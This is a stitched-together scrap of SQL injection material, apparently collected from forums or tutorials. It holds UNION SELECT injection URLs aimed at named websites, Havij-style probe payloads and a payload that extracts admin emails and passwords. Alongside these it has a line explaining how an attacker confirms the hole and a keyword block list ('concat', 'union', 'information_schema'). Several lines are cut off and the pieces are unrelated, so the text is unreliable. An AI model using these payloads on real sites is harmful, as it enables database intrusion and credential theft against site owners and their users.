http://www.itamed.com/mcms/itamedt/content.cfm?pulldata=scmsmembers.cfm&function=members&perform=memberappita&entity_id=11+limit+0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version
-999.9+union+all+select+%27R3DM0V3_hvj_injection',null%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL
If field is not sanitized, and only if the number of the columns used in the UNION SELECT match with the columns of the query, most likely will appear the string 91351456272.9 somewhere in the page. That will be the confirmed for the attacker of a vulnerability in the page.
Your thoughts about changing the nature of your business are helpful. On my site, for instance, it's entirely safe to fail any request with the string 'concat' or %20union' or 'information_schema'.
union all select id =null union all select id =1 +and+ false + union +all +select id = 9999 union all select +union+distinct+select+
As you may know, there are several different methods of Error Based Injection. I know there's been a few tutorials lately, but I always love showing you guys something new.
999999.9+union+all+select+%27R3DM0V3_hvj_injection',null
...site.net/lt/y.php?t=999999.9'+union+all+select+0x31303235343830303536,(select+concat(0x7e,0x27,unhex(Hex(cast(a_admin.email+as+char))),0x5e,unhex(Hex(cast(a_admin.password+as+char))),0x5e